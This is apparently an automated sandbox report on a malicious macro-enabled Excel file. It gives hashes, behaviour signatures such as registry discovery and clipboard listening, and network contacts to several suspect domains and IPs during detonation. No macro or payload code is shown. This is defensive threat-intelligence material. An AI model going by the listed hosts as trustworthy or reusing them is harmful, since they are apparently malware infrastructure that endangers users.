Malware Analysis Report

2025-03-15 07:23

Sample ID 241111-zvm5bazkep
Target bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615
SHA256 bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615
Tags
macro xlm discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615

Threat Level: Known bad

The file bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615 was found to be: Known bad.

Malicious Activity Summary

macro xlm discovery

Suspicious Office macro

System Location Discovery: System Language Discovery

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 21:02

Signatures

Suspicious Office macro

macro xlm
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 21:02

Reported

2024-11-11 21:05

Platform

win7-20240903-en

Max time kernel

143s

Max time network

145s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm

Network

Country Destination Domain Proto
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 brainora.com udp
ES 217.76.142.114:80 brainora.com tcp
US 8.8.8.8:53 breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 www.breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 www.breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 beta.orlandofoodtours.com udp
US 66.115.130.163:80 beta.orlandofoodtours.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp

Files

memory/2120-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-1-0x000000007260D000-0x0000000072618000-memory.dmp

memory/2120-18-0x000000007260D000-0x0000000072618000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 21:02

Reported

2024-11-11 21:05

Platform

win10v2004-20241007-en

Max time kernel

128s

Max time network

148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 182.103.231.94.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.14.105.86.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 brainora.com udp
ES 217.76.142.114:80 brainora.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 www.breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 www.breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 24.33.186.213.in-addr.arpa udp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 beta.orlandofoodtours.com udp
US 66.115.130.163:80 beta.orlandofoodtours.com tcp
US 8.8.8.8:53 6.35.56.5.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 164.30.151.185.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 104.208.201.84.in-addr.arpa udp

Files

memory/2268-1-0x00007FFB43F2D000-0x00007FFB43F2E000-memory.dmp

memory/2268-0-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-3-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-2-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-4-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-6-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-5-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-8-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-10-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-9-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-7-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-12-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-11-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-13-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-14-0x00007FFB01C50000-0x00007FFB01C60000-memory.dmp

memory/2268-15-0x00007FFB01C50000-0x00007FFB01C60000-memory.dmp

memory/2268-33-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-34-0x00007FFB43F2D000-0x00007FFB43F2E000-memory.dmp

memory/2268-35-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-36-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 047ee9e8d54c778920df837ecc8d31f2
SHA1 6d2262c49a9941837290e1fd17639e4eed7ea111
SHA256 705f421fbf0a035e9e7e5eae68cb59c818cf47fc13d41fcee958a6fc3a5ba836
SHA512 22b9142f7ca97a5f1689afb16755b1fc58a86acacde5906d640c27c1dd7786615f25ee45f3e2224f7d0ccd1a11a39de3826999f9f20b9a640370676843e4618e